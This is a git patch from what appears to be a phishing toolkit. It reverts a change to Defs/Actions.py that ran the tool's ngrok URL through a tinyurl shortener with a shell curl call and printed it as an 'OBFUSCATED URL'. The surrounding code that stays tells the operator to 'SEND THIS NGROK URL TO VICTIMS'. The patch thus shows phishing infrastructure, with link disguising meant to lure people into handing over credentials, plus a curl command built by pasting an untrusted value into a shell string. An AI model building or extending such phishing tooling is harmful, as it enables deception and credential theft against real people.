From d8ac1e9be5835957c5dcd95c3b65bee60b3cc289 Mon Sep 17 00:00:00 2001 From: AnonUD4Y Date: Thu, 10 Oct 2019 12:37:07 +0000 Subject: [PATCH] Revert "Added Tinyurl ! (Only For NGROK )" --- Defs/Actions.py | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/Defs/Actions.py b/Defs/Actions.py index 86c3964..c5db9d6 100644 --- a/Defs/Actions.py +++ b/Defs/Actions.py @@ -173,15 +173,9 @@ def selectServer(port): #Question where user must select server urlFile = open('ngrok.url', 'r') url = urlFile.read() urlFile.close() - system("curl -o tinyurlsource.txt -s 'http://tinyurl.com/create.php?url='"+url) - system("""grep success -F tinyurlsource.txt | cut -d'"' -f6 > tinyurl.txt """) - urlFile = open('tinyurl.txt', 'r') - tinyurl = urlFile.read() - urlFile.close() if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: print(_("\n{0}[{1}!{0}]{1} SEND THIS NGROK URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} NGROK URL: {2}".format(MAIN0, MAIN2, MAIN3, port) + url + "{1}").format(MAIN0, MAIN4, MAIN3)) - print("{0}[{1}*{0}]{1} OBFUSCATED URL: {2}".format(MAIN0, MAIN2, MAIN3, port) + tinyurl + "{1}".format(MAIN0, MAIN4, MAIN3)) - print("\n") + print("\n") break elif choice == '2':